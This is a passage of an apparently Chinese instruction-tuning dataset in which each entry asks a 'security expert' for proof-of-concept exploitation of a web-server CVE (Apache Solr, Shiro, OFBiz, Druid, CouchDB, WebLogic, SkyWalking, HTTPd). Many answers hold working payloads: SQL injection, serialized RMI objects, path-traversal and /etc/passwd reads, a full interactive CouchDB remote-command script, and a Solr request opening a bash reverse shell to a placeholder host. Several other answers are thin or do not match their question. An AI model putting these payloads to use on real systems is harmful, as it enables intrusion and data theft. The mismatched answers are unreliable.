text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\nAccept-Encoding: gzip, deflate\nAccept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6\nCache-Control: max-age=0\nContent-Type: application/json\nUpgrade-Insecure-Requests: 1\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36\nContent-Length: 416\n\n{\n    \"query\": \"query queryData($duration: Duration!) {globalP99: getLinearIntValues(metric: {name: \\\"all_p99\\\", id: \\\"') UNION ALL SELECT NULL,CONCAT('~', H2VERSION(), '~')--\\\" }, duration: $duration) {  values { value } }}\",\n    \"variables\": {\n        \"duration\": {\n            \"end\": \"2020-08-07 1418\",\n            \"start\": \"2020-08-07 1417\",\n            \"step\": \"MINUTE\"\n        }\n    }\n}\n", "category": "poc_web_server_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web服务器漏洞/Apache SkyWalking graphql SQL注入漏洞 CVE-2020-9483.md"}
    1039. 

  1039. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Apache Shiro  1.6.0 身份认证绕过漏洞 CVE-2020-13933\n漏洞描述:2020年8月18日,Apache Shiro官方发布安全通告 Apache Shiro身份验证绕过漏洞(CVE-2020-13933),经过分析,攻击者可以通过构造特殊的HTTP请求实现身份验证绕过。\n影响版本:``` Apache Shiro < 1.6.0 ```\n", "input": "", "output": "【漏洞类型】web_server_vulnerability\n【CVE编号】CVE-2020-13933\n【POC利用方法】\n1. Apache Shiro < 1.6.0\n2. 2020年8月18日,Apache Shiro官方发布安全通告 Apache Shiro身份验证绕过漏洞(CVE-2020-13933),经过分析,攻击者可以通过构造特殊的HTTP请求实现身份验证绕过。\n", "category": "poc_web_server_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web服务器漏洞/Apache Shiro 1.6.0 身份认证绕过漏洞 CVE-2020-13933.md"}
    1040. 

  1040. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Apache Shiro 小于1.2.4反序列化漏洞 CVE-2016-4437\n漏洞描述:Apache Shiro是一款开源安全框架,提供身份验证、授权、密码学和会话管理。Shiro框架直观、易用,同时也能提供健壮的安全性。 Apache Shiro 1.2.4及以前版本中,加密的用户信息序列化后存储在名为remember-me的Cookie中。攻击者可以使用Shiro的默认密钥伪造用户Cookie,触发Java反序列化漏洞,进而在目标机器上执行任意命令。\n影响版本:``` Apache Shiro <= 1.2.4 ```\n", "input": "", "output": "【漏洞类型】web_server_vulnerability\n【CVE编号】CVE-2016-4437\n【POC利用方法】\n1. Apache Shiro <= 1.2.4\n2. https://github.com/vulhub/vulhub.git\ncd vulhub/shiro/CVE-2016-4437\ndocker-compose up -d\n3. https://github.com/insightglacier/Shiro_exploit\nhttps://github.com/feihong-cs/ShiroExploit/releases/tag/v2.51\n", "category": "poc_web_server_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web服务器漏洞/Apache Shiro 小于1.2.4反序列化漏洞 CVE-2016-4437.md"}
    1041. 

  1041. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Apache OFBiz RMI Bypass RCE CVE-2021-29200\n漏洞描述:由于Apache OFBiz存在Java RMI反序列化漏洞,未经身份验证的用户可以执行RCE攻击,导致服务器被接管。 参考链接: - https://mp.weixin.qq.com/s/vM0pXZ5mhusFBsj1xD-2zw - https://xz.aliyun.com/t/9556\n影响版本:``` Apache OFBiz < 17.12.07 ```\n", "input": "", "output": "【漏洞类型】web_server_vulnerability\n【CVE编号】CVE-2021-29200\n【POC利用方法】\n1. Apache OFBiz < 17.12.07\n2. POST /webtools/control/SOAPService HTTP/1.1\nHost: xxx\nUser-Agent: python-requests/2.24.0\nAccept-Encoding: gzip, deflate\nAccept: */*\nConnection: close\nContent-Type: text/xml\nContent-Length: 877\n\n\n<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:ser=\"http://ofbiz.apache.org/service/\">  \n  <soapenv:Header/>  \n  <soapenv:Body>\n    <ser>\n      <map-Map>\n        <map-Entry>\n          <map-Key>\n            <cus-obj>ACED0005737200326A617661782E6D616E6167656D656E742E72656D6F74652E726D692E524D49436F6E6E656374696F6E496D706C5F5374756200000000000000020200007872001A6A6176612E726D692E7365727665722E52656D6F746553747562ECC98BE1651A0200007872001C6A6176612E726D692E7365727665722E52656D6F74654F626A656374D361B4910C61331E03000078707738000A556E6963617374526566000F3130342E3135362E3233312E3135300000270FFFFFFFFFEF34D1DB00000000000000000000000000000078</cus-obj>\n          </map-Key>  \n          <map-Value>  \n            <std-String/>\n          </map-Value>\n        </map-Entry>\n      </map-Map>\n    </ser>\n  </soapenv:Body>\n</soapenv:Envelope>\n3. <soapenv:Header/>\n", "category": "poc_web_server_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web服务器漏洞/Apache OFBiz RMI Bypass RCE CVE-2021-29200.md"}
    1042. 

  1042. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Weblogic SSRF漏洞 CVE-2014-4210\n漏洞描述:Weblogic中存在一个SSRF漏洞,利用该漏洞可以发送任意HTTP请求,进而攻击内网中redis、fastcgi等脆弱组件,此漏洞可通过HTTP协议利用,未经身份验证的远程攻击者可利用此漏洞影响受影响组件的机密性\n影响版本:``` Oracle WebLogic Server 10.0.2.0 Oracle WebLogic Server 10.3.6.0 ```\n", "input": "", "output": "【漏洞类型】web_server_vulnerability\n【CVE编号】CVE-2014-4210\n【POC利用方法】\n1. Oracle WebLogic Server 10.0.2.0\nOracle WebLogic Server 10.3.6.0\n2. git clone https://github.com/vulhub/vulhub.git\ncd vulhub/weblogic/ssrd\ndocker-compose up -d\n3. http://xxx.xxx.xxx.xxx:7001/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://xxx.xxx.xxx.xxx:7001\n", "category": "poc_web_server_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web服务器漏洞/Weblogic SSRF漏洞 CVE-2014-4210.md"}
    1043. 

  1043. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Apache Superset SECRET_KEY 未授权访问漏洞 CVE-2023-27524\n漏洞描述:Apache Superset 是一款现代化的开源大数据工具,也是企业级商业智能 Web 应用,用于数据探索分析和数据可视化。它提供了简单易用的无代码可视化构建器和声称是最先进的 SQL 编辑器,用户可以使用这些工具快速地构建数据仪表盘。CVE-2023-27524 中,未经授权的攻击者可根据默认配置的SECRET_KEY伪造成管理员用户访问Apache Superset。\n影响版本:``` Apache Superse <= 2.0.1 ```\n", "input": "", "output": "【漏洞类型】web_server_vulnerability\n【CVE编号】CVE-2023-27524\n【POC利用方法】\n1. Apache Superse <= 2.0.1\n2. app.name=\"Apache Superset\"\n3. https://github.com/apache/superset/pull/23186/files\n", "category": "poc_web_server_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web服务器漏洞/Apache Superset SECRET_KEY 未授权访问漏洞 CVE-2023-27524.md"}
    1044. 

  1044. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Apache Druid 远程代码执行漏洞 CVE-2021-26919\n漏洞描述:Apache Druid 是用Java编写的面向列的开源分布式数据存储,旨在快速获取大量事件数据,并在数据之上提供低延迟查询。2021年3月30日,Apache Druid官方发布安全更新,修复了 CVE-2021-26919 Apache Druid 远程代码执行漏洞。由于Apache Druid 默认情况下缺乏授权认证,攻击者可直接构造恶意请求执行任意代码,控制服务器。 参考链接: * http://m0d9.me/2021/04/21/Apache-Druid-CVE-2021-26919-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/ * https://help.aliyun.com/noticelist/articleid/1060822985.html\n影响版本:``` Apache Druid < 0.20.2 ```\n", "input": "", "output": "【漏洞类型】web_server_vulnerability\n【CVE编号】CVE-2021-26919\n【POC利用方法】\n1. Apache Druid < 0.20.2\n2. url = \"jdbc:mysql://localhost:3307/?autoDeserialize=true&statementInterceptors=com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor&maxAllowedPacket=65535\"\nuser =\"cb1\"\npassword=\"password\"\n3. * http://m0d9.me/2021/04/21/Apache-Druid-CVE-2021-26919-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/\n", "category": "poc_web_server_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web服务器漏洞/Apache Druid 远程代码执行漏洞 CVE-2021-26919.md"}
    1045. 

  1045. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Apache Druid LoadData 任意文件读取漏洞 CVE-2021-36749\n漏洞描述:由于用户指定 HTTP InputSource 没有做出限制,可以通过将文件 URL 传递给 HTTP InputSource 来绕过应用程序级别的限制。攻击者可利用该漏洞在未授权情况下,构造恶意请求执行文件读取,最终造成服务器敏感性信息泄露。\n影响版本:``` Apache Druid ```\n网络测绘:``` title=\"Apache Druid\" ```\n", "input": "", "output": "【漏洞类型】web_server_vulnerability\n【CVE编号】CVE-2021-36749\n【POC利用方法】\n1. Apache Druid\n2. title=\"Apache Druid\"\n3. POST /druid/indexer/v1/sampler?for=connect\nAccept: application/json, text/plain, */*\n\n{\"type\":\"index\",\"spec\":{\"type\":\"index\",\"ioConfig\":{\"type\":\"index\",\"inputSource\":{\"type\":\"http\",\"uris\":[\"file:///etc/passwd\"]},\"inputFormat\":{\"type\":\"regex\",\"pattern\":\"(.*)\",\"columns\":[\"raw\"]}},\"dataSchema\":{\"dataSource\":\"sample\",\"timestampSpec\":{\"column\":\"!!!_no_such_column_!!!\",\"missingValue\":\"1970-01-01T00:00:00Z\"},\"dimensionsSpec\":{}},\"tuningConfig\":{\"type\":\"index\"}},\"samplerConfig\":{\"numRows\":500,\"timeoutMs\":15000}}\n", "category": "poc_web_server_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web服务器漏洞/Apache Druid LoadData 任意文件读取漏洞 CVE-2021-36749.md"}
    1046. 

  1046. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Apache CouchDB epmd 远程命令执行漏洞 CVE-2022-24706\n漏洞描述:Apache CouchDB 是一个开源的无缝多主同步数据库,使用直观的HTTP/JSON API,并为可靠性而设计。 4月26日,Apache发布安全公告,公开了Apache CouchDB中的一个远程代码执行漏洞(CVE-2022-24706)。在3.2.2 版本之前的 Apache CouchDB 中,可以在不进行身份验证的情况下访问不正确的默认安装并获得管理员权限\n影响版本:``` CouchDB <= 3.2.1 ```\n网络测绘:``` port=\"4369\" && \"couchdb\" ```\n", "input": "", "output": "【漏洞类型】web_server_vulnerability\n【CVE编号】CVE-2022-24706\n【POC利用方法】\n1. CouchDB <= 3.2.1\n2. port=\"4369\" && \"couchdb\"\n3. # Exploit Title: Apache CouchDB 3.2.1 - Remote Code Execution (RCE)\n# Date: 2022-01-21\n# Exploit Author: Konstantin Burov, @_sadshade\n# Software Link: https://couchdb.apache.org/\n# Version: 3.2.1 and below\n# Tested on: Kali 2021.2\n# Based on 1F98D's Erlang Cookie - Remote Code Execution\n# Shodan: port:4369 \"name couchdb at\"\n# CVE: CVE-2022-24706\n# References:\n#  https://habr.com/ru/post/661195/\n#  https://www.exploit-db.com/exploits/49418\n#  https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/\n#  https://book.hacktricks.xyz/pentesting/4369-pentesting-erlang-port-mapper-daemon-epmd#erlang-cookie-rce\n# \n#\n#!/usr/local/bin/python3\n\nimport socket\nfrom hashlib import md5\nimport struct\nimport sys\nimport re\nimport time\n\nTARGET = \"\"\nEPMD_PORT = 4369 # Default Erlang distributed port\nCOOKIE = \"monster\" # Default Erlang cookie for CouchDB \nERLNAG_PORT = 0\nEPM_NAME_CMD = b\"\\x00\\x01\\x6e\" # Request for nodes list\n\n# Some data:\nNAME_MSG  = b\"\\x00\\x15n\\x00\\x07\\x00\\x03\\x49\\x9cAAAAAA@AAAAAAA\"\nCHALLENGE_REPLY = b\"\\x00\\x15r\\x01\\x02\\x03\\x04\"\nCTRL_DATA  = b\"\\x83h\\x04a\\x06gw\\x0eAAAAAA@AAAAAAA\\x00\\x00\\x00\\x03\"\nCTRL_DATA += b\"\\x00\\x00\\x00\\x00\\x00w\\x00w\\x03rex\"\n\n\ndef compile_cmd(CMD):\n    MSG  = b\"\\x83h\\x02gw\\x0eAAAAAA@AAAAAAA\\x00\\x00\\x00\\x03\\x00\\x00\\x00\"\n    MSG += b\"\\x00\\x00h\\x05w\\x04callw\\x02osw\\x03cmdl\\x00\\x00\\x00\\x01k\"\n    MSG += struct.pack(\">H\", len(CMD))\n    MSG += bytes(CMD, 'ascii')\n    MSG += b'jw\\x04user'\n    PAYLOAD = b'\\x70' + CTRL_DATA + MSG\n    PAYLOAD = struct.pack('!I', len(PAYLOAD)) + PAYLOAD\n    return PAYLOAD\n\nprint(\"Remote Command Execution via Erlang Distribution Protocol.\\n\")\n\nwhile not TARGET:\n    TARGET = input(\"Enter target host:\\n> \")\n\n# Connect to EPMD:\ntry:\n    epm_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n    epm_socket.connect((TARGET, EPMD_PORT))\nexcept socket.error as msg:\n    print(\"Couldnt connect to EPMD: %s\\n terminating program\" % msg)\n    sys.exit(1)\n    \nepm_socket.send(EPM_NAME_CMD) #request Erlang nodes\nif epm_socket.recv(4) == b'\\x00\\x00\\x11\\x11': # OK\n    data = epm_socket.recv(1024)\n    data = data[0:len(data) - 1].decode('ascii')\n    data = data.split(\"\\n\")\n    if len(data) == 1:\n        choise = 1\n        print(\"Found \" + data[0])\n    else:\n        print(\"\\nMore than one node found, choose which one to use:\")\n        line_number = 0\n        for line in data:\n            line_number += 1\n            print(\" %d) %s\" %(line_number, line))\n        choise = int(input(\"\\n> \"))\n        \n    ERLNAG_PORT = int(re.search(\"\\d+$\",data[choise - 1])[0])\nelse:\n    print(\"Node list request error, exiting\")\n    sys.exit(1)\nepm_socket.close()\n\n# Connect to Erlang port:\ntry:\n    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n    s.connect((TARGET, ERLNAG_PORT))\nexcept socket.error as msg:\n    print(\"Couldnt connect to Erlang server: %s\\n terminating program\" % msg)\n    sys.exit(1)\n   \ns.send(NAME_MSG)\ns.recv(5)                    # Receive \"ok\" message\nchallenge = s.recv(1024)     # Receive \"challenge\" message\nchallenge = struct.unpack(\">I\", challenge[9:13])[0]\n\n#print(\"Extracted challenge: {}\".format(challenge))\n\n# Add Challenge Digest\nCHALLENGE_REPLY += md5(bytes(COOKIE, \"ascii\")\n    + bytes(str(challenge), \"ascii\")).digest()\ns.send(CHALLENGE_REPLY)\nCHALLENGE_RESPONSE = s.recv(1024)\n\nif len(CHALLENGE_RESPONSE) == 0:\n    print(\"Authentication failed, exiting\")\n    sys.exit(1)\n\nprint(\"Authentication successful\")\nprint(\"Enter command:\\n\")\n\ndata_size = 0\nwhile True:\n    if data_size <= 0:\n        CMD = input(\"> \")\n        if not CMD:\n            continue\n        elif CMD == \"exit\":\n            sys.exit(0)\n        s.send(compile_cmd(CMD))\n        data_size = struct.unpack(\">I\", s.recv(4))[0] # Get data size\n        s.recv(45)              # Control message\n        data_size -= 45         # Data size without control message\n        time.sleep(0.1)\n    elif data_size < 1024:        \n        data = s.recv(data_size)\n        #print(\"S---data_size: %d, data_recv_size: %d\" %(data_size,len(data)))\n        time.sleep(0.1)\n        print(data.decode())\n        data_size = 0\n    else:        \n        data = s.recv(1024)\n        #print(\"L---data_size: %d, data_recv_size: %d\" %(data_size,len(data)))\n        time.sleep(0.1)\n        print(data.decode(),end = '')\n        data_size -= 1024\n", "category": "poc_web_server_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web服务器漏洞/Apache CouchDB epmd 远程命令执行漏洞 CVE-2022-24706.md"}
    1047. 

  1047. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:ACME Mini_httpd 任意文件读取漏洞 CVE-2018-18778\n漏洞描述:漏洞原因是由于没有过滤Http包头的特定字段,导致可以构造访问系统文件的路径,从而导致可访问任意文件,攻击者可以利用该漏洞读取设备的任意文件,这将严重威胁采用Mini_httpd的设备的安全性。\n影响版本:``` ACME mini_httpd before 1.30 ```\n网络测绘:``` app=\"ACME-mini_httpd\" ```\n", "input": "", "output": "【漏洞类型】web_server_vulnerability\n【CVE编号】CVE-2018-18778\n【POC利用方法】\n1. ACME mini_httpd before 1.30\n2. app=\"ACME-mini_httpd\"\n3. (void) snprintf( vfile, sizeof(vfile), \"%s/%s\", req_hostname, f );\n", "category": "poc_web_server_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web服务器漏洞/ACME Mini_httpd 任意文件读取漏洞 CVE-2018-18778.md"}
    1048. 

  1048. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Apache Solr RCE 远程命令执行漏洞 CVE-2017-12629\n漏洞描述:Apache Solr 是一个开源的搜索服务器。Solr 使用 Java 语言开发,主要基于 HTTP 和 Apache Lucene 实现。原理大致是文档通过Http利用XML加到一个搜索集合中。查询该集合也是通过 http收到一个XML/JSON响应来实现。此次7.1.0之前版本总共爆出两个漏洞:[XML实体扩展漏洞(XXE)](https://github.com/vulhub/vulhub/tree/master/solr/CVE-2017-12629-XXE)和远程命令执行漏洞(RCE),二者可以连接成利用链,编号均为CVE-2017-12629。\n影响版本:``` Apache Solr < 7.1 ```\n", "input": "", "output": "【漏洞类型】web_server_vulnerability\n【CVE编号】CVE-2017-12629\n【POC利用方法】\n1. Apache Solr < 7.1\n2. https://github.com/vulhub/vulhub.git\ncd vulhub/solr/CVE-2017-12629\ndocker-compose build\ndocker-compose up -d\n3. POST /solr/demo/config HTTP/1.1\nHost: xxx.xxx.xxx.xxx:8983\nConnection: close\nContent-Type: application/json  \nContent-Length: 198\n\n{\n  \"add-listener\" : {\n    \"event\":\"postCommit\",\n    \"name\":\"newlistener-1\",\n    \"class\":\"solr.RunExecutableListener\",\n    \"exe\":\"ping\",\n    \"dir\":\"/bin/\",\n    \"args\":[\"1.1.1.1\"]\n  }\n}\n", "category": "poc_web_server_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web服务器漏洞/Apache Solr RCE 远程命令执行漏洞 CVE-2017-12629.md"}
    1049. 

  1049. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Apache Solr JMX服务 RCE CVE-2019-12409\n漏洞描述:Java ManagementExtensions(JMX)是一种Java技术,为管理和监视应用程序、系统对象、设备(如打印机)和面向服务的网络提供相应的工具。JMX 作为 Java的一种Bean管理机制,如果JMX服务端口暴露,那么远程攻击者可以让该服务器远程加载恶意的Bean文件,随着Bean的滥用导致远程代码执行。\n影响版本:``` Apache Solr 8.1.1 Apache Solr 8.2.0 ```\n", "input": "", "output": "【漏洞类型】web_server_vulnerability\n【CVE编号】CVE-2019-12409\n【POC利用方法】\n1. Apache Solr 8.1.1\nApache Solr 8.2.0\n2. docker pull solr:8.2.0\ndocker run --name solr -d -p 8983:8983 -t solr:8.2.0\n3. nmap xxx.xxx.xxx.xxx -p 18983\n", "category": "poc_web_server_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web服务器漏洞/Apache Solr JMX服务 RCE CVE-2019-12409.md"}
    1050. 

  1050. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Weblogic XMLDecoder 远程代码执行漏洞 CVE-2017-10271\n漏洞描述:Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。\n影响版本:``` Weblogic 10.3.6.0.0 Weblogic 12.1.3.0.0 Weblogic 12.2.1.0.0 Weblogic 12.2.1.2.0 ```\n", "input": "", "output": "【漏洞类型】web_server_vulnerability\n【CVE编号】CVE-2017-10271\n【POC利用方法】\n1. Weblogic 10.3.6.0.0\nWeblogic 12.1.3.0.0\nWeblogic 12.2.1.0.0\nWeblogic 12.2.1.2.0\n2. git clone https://github.com/vulhub/vulhub.git\ncd vulhub/weblogic/CVE-2017-10271\ndocker-compose up -d\n3. 其他可利用URL\n/wls-wsat/CoordinatorPortType\n/wls-wsat/RegistrationPortTypeRPC\n/wls-wsat/ParticipantPortType\n/wls-wsat/RegistrationRequesterPortType\n/wls-wsat/CoordinatorPortType11\n/wls-wsat/RegistrationPortTypeRPC11\n/wls-wsat/ParticipantPortType11\n/wls-wsat/RegistrationRequesterPortType11\n", "category": "poc_web_server_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web服务器漏洞/Weblogic XMLDecoder 远程代码执行漏洞 CVE-2017-10271.md"}
    1051. 

  1051. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Apache HTTPd 路径穿越漏洞 CVE-2021-42013\n漏洞描述:Apache HTTPD是一款HTTP服务器,它可以通过mod_php来运行PHP网页。其2.4.49~2.4.50-本中存在一个漏洞,可读取服务器中的任意文件 (CVE-2021-41773 的漏洞绕过)\n影响版本:``` Apache HTTPd 2.4.49~2.4.50版本 ```\n网络测绘:``` server=\"Apache/2.4.49\" ```\n", "input": "", "output": "【漏洞类型】web_server_vulnerability\n【CVE编号】CVE-2021-42013\n【POC利用方法】\n1. Apache HTTPd 2.4.49~2.4.50版本\n2. server=\"Apache/2.4.49\"\n3. /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd\n", "category": "poc_web_server_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web服务器漏洞/Apache HTTPd 路径穿越漏洞 CVE-2021-42013.md"}
    1052. 

  1052. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Apache Kylin DiagnosisController.java 命令注入漏洞 CVE-2020-13925\n漏洞描述:6月,京东安全的蓝军团队发现了一个 apache kylin 远程命令执行严重漏洞( CVE-2020-13925)。黑客可以利用这个漏洞,登录任何管理员账号和密码默认未修改的账号,获得管理员权限。由于Apache Kylin被广泛应用于企业的大数据分析平台,因此该漏洞将对企业核心数据具有较大的危害,存在数据泄露风险,建议用户尽快升级软件至安全版本。\n影响版本:``` Apache Kylin 2.3.0 ~ 2.3.2 Apache Kylin 2.4.0 ~ 2.4.1 Apache Kylin 2.5.0 ~ 2.5.2 Apache Kylin 2.6.0 ~ 2.6.5 Apache Kylin 3.0.0-alpha ```\n", "input": "", "output": "【漏洞类型】web_server_vulnerability\n【CVE编号】CVE-2020-13925\n【POC利用方法】\n1. Apache Kylin 2.3.0 ~ 2.3.2\nApache Kylin 2.4.0 ~ 2.4.1\nApache Kylin 2.5.0 ~ 2.5.2\nApache Kylin 2.6.0 ~ 2.6.5\nApache Kylin 3.0.0-alpha\n2. docker pull apachekylin/apache-kylin-standalone:3.0.1\n\ndocker run -d \\\n-m 8G \\\n-p 7070:7070 \\\n-p 8088:8088 \\\n-p 50070:50070 \\\n-p 8032:8032 \\\n-p 8042:8042 \\\n-p 16010:16010 \\\napachekylin/apache-kylin-standalone:3.0.1\n3. /**\n     * Get diagnosis information for project\n     */\n    @RequestMapping(value = \"/project/{project}/download\", method = { RequestMethod.GET }, produces = {\n            \"application/json\" })\n    @ResponseBody\n    public void dumpProjectDiagnosisInfo(@PathVariable String project, final HttpServletRequest request,\n            final HttpServletResponse response) {\n        try (AutoDeleteDirectory diagDir = new AutoDeleteDirectory(\"diag_project\", \"\")) {\n            String filePath = dgService.dumpProjectDiagnosisInfo(project, diagDir.getFile());\n            setDownloadResponse(filePath, response);\n        } catch (IOException e) {\n            throw new InternalErrorException(\"Failed to dump project diagnosis info. \" + e.getMessage(), e);\n        }\n\n    }\n", "category": "poc_web_server_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web服务器漏洞/Apache Kylin DiagnosisController.java 命令注入漏洞 CVE-2020-13925.md"}
    1053. 

  1053. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Apache Solr 代码执行漏洞 CNVD-2023-27598\n漏洞描述:Solr 以 Solrcloud 模式启动且可出网时,未经身份验证的远程攻击者可以通过发送特制的数据包进行利用,最终在目标系统上远程执行任意代码。\n影响版本:``` 8.10.0 <= Apache Solr < 9.2.0 ```\n网络测绘:``` app=\"APACHE-Solr\" ```\n", "input": "", "output": "【漏洞类型】web_server_vulnerability\n【POC利用方法】\n1. 8.10.0 <= Apache Solr < 9.2.0\n2. app=\"APACHE-Solr\"\n3. POST /solr/demo/config HTTP/1.1\nHost: 192.168.1.92:8983\nContent-Length: 180\nContent-Type: application/json\n\n{\"add-listener\":{\"event\":\"postCommit\",\"name\":\"suiyi\",\"class\":\"solr.RunExecutableListener\",\"exe\":\"bash\",\"dir\":\"/bin/\",\"args\":[\"-c\", \"bash -i >& /dev/tcp/your-ip/9999 0>&1\"]}}\n", "category": "poc_web_server_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web服务器漏洞/Apache Solr 代码执行漏洞 CNVD-2023-27598.md"}
    1054. 

  1054. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Apache Axis 远程代码执行漏洞\n漏洞描述:Apache Axis 服务被用于部署各种接口服务。其中,AdminService 接口允许管理员远程访问管理服务,相关配置在 `/axis/WEB-INF/server-config.wsdd`(部署应用后产生),其中`enableRemoteAdmin`默认为`false`,只允许本地管理。 若将`enableRemoteAdmin`设置为`true`,则可以执行 JNDI 注入,执行任意代码或反弹 Shell。\n", "input": "", "output": "【漏洞类型】web_server_vulnerability\n【POC利用方法】\n1. vim ~/.profile\n2. export AXIS_HOME=/usr/tomcat/apache-tomcat-8.5.90/webapps/axis\nexport AXIS_LIB=$AXIS_HOME/WEB-INF/lib\nexport AXISCLASSPATH=$AXIS_LIB/axis.jar:$AXIS_LIB/commons-discovery-0.2.jar:$AXIS_LIB/commons-logging-1.0.4.jar:$AXIS_LIB/jaxrpc.jar:$AXIS_LIB/saaj.jar:$AXIS_LIB/log4j-1.2.8.jar:$AXIS_LIB/xml-apis.jar:$AXIS_LIB/xercesImpl.jar:$AXIS_LIB/wsdl4j-1.5.1.jar\n3. source ~/.profile\n", "category": "poc_web_server_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web服务器漏洞/Apache Axis 远程代码执行漏洞 CVE-2019-0227.md"}
    1055. 

  1055. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:GoCD plugin 任意文件读取漏洞 CVE-2021-43287\n漏洞描述:*GoCD*,一个开源的持续集成和持续交付系统,可以在持续交付过程中执行编译,自动化测试,自动部署等等,与Jenkins类似。 GoCD plugin aip 参数中的 pluginName 参数存在任意文件读取漏洞,导致攻击者可以获取服务器中的任意敏感信息\n影响版本:``` GoCD ```\n网络测绘:``` title=\"Create a pipeline - Go\" ```\n", "input": "", "output": "【漏洞类型】web_server_vulnerability\n【CVE编号】CVE-2021-43287\n【POC利用方法】\n1. title=\"Create a pipeline - Go\"\n2. /go/add-on/business-continuity/api/plugin?folderName=&pluginName=../../../etc/passwd\n", "category": "poc_web_server_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web服务器漏洞/GoCD plugin 任意文件读取漏洞 CVE-2021-43287.md"}
    1056. 

  1056. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Apache Solr Velocity模板远程执行 CVE-2019-17558\n漏洞描述:2019年10月末,GitHub代码中安全研究员S00pY发布一个Apache Solr Velocity模版注入远程命令执行的POC,发现网络上出现针对Apache Solr服务器的远程代码执行漏洞。该漏洞是由于Velocity模板存在注入所致(Velocity是一个基于Java的模板引擎,可让使用者通过模板语言引用Java中定义的对象)。攻击者在知道Solr服务器上Core名称后,先把`params.resource.loader.enabled`设置为true(就可加载指定资源),再进行远程执行命令。\n影响版本:``` Apache Solr 5.x 至 8.2.0 ```\n", "input": "", "output": "【漏洞类型】web_server_vulnerability\n【CVE编号】CVE-2019-17558\n【POC利用方法】\n1. Apache Solr 5.x 至 8.2.0\n2. https://github.com/vulhub/vulhub.git\ncd vulhub/solr/CVE-2019-17558\ndocker-compose build\ndocker-compose up -d\n\n# 创建一个solr核心test\ndocker-compose exec solr bash bin/solr create_core -c test -d example/example-DIH/solr/db\n3. POST /solr/test/config HTTP/1.1\nHost: xxx.xxx.xxx.xxx:8983\nPragma: no-cache\nCache-Control: no-cache\nUpgrade-Insecure-Requests: 1\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\nAccept-Encoding: gzip, deflate\nAccept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6\nConnection: close\nContent-Length: 259\n\n{\n\n  \"update-queryresponsewriter\": {\n    \"startup\": \"lazy\",\n    \"name\": \"velocity\",\n    \"class\": \"solr.VelocityResponseWriter\",\n    \"template.base.dir\": \"\",\n    \"solr.resource.loader.enabled\": \"true\",\n    \"params.resource.loader.enabled\": \"true\"\n  }\n}\n", "category": "poc_web_server_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web服务器漏洞/Apache Solr 